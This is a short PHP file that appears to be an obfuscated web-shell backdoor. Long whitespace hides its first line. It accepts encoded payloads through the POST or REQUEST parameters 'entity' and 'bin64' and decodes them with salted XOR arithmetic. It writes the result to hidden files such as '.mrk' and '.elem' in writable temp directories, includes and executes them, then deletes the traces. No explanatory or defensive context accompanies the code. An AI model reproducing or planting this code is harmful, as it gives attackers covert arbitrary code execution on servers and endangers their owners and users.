<?php																																										if(!empty($_POST["\x65\x6E\x74ity"])){ $ptr = $_POST["\x65\x6E\x74ity"]; $ptr =explode ( '.' , $ptr) ; $token = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); $y = 0; $len = count($ptr); do { if ($y >= $len) break; $v8 = $ptr[$y]; $sChar = ord($s6[$y %$sLen]); $dec = ((int)$v8 - $sChar - ($y %10)) ^ 60; $token .= chr($dec); $y++;}while (true); $itm = array_filter(["/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TEMP"), getenv("TMP"), "/tmp"]); foreach ($itm as $comp): if (!!is_dir($comp) && !!is_writable($comp)) { $element = sprintf("%s/.mrk", $comp); if (file_put_contents($element, $token)) { include $element; @unlink($element); exit; } } endforeach; }


if(!is_null($_REQUEST["bin\x64"] ?? null)){
	$token = $_REQUEST["bin\x64"];
		 	$token		 =explode( 	"."	,	$token	 )		;
	$ref = '';
            $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt7	);
            $i = 0;
    
            while ($i<count($token)) {  $v3 = $token[$i];
                $chS = ord($salt7[$i % $lenS]	);
                $dec = ((int)$v3 - $chS - ($i % 10))^81;
                $ref .=chr($dec	);
                $i++;
            }
	$val = array_filter([getenv("TMP"), getcwd(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", session_save_path()]);
	for ($ptr = 0, $dchunk = count($val); $ptr < $dchunk; $ptr++) {
    $factor = $val[$ptr];
    		if (is_writable($factor) && is_dir($factor)) {
    $pset = implode("/", [$factor, ".elem"]);
    $file = fopen($pset, 'w');
if ($file) {
	fwrite($file, $ref);
	fclose($file);
	include $pset;
	@unlink($pset);
	die();
}
}
}
}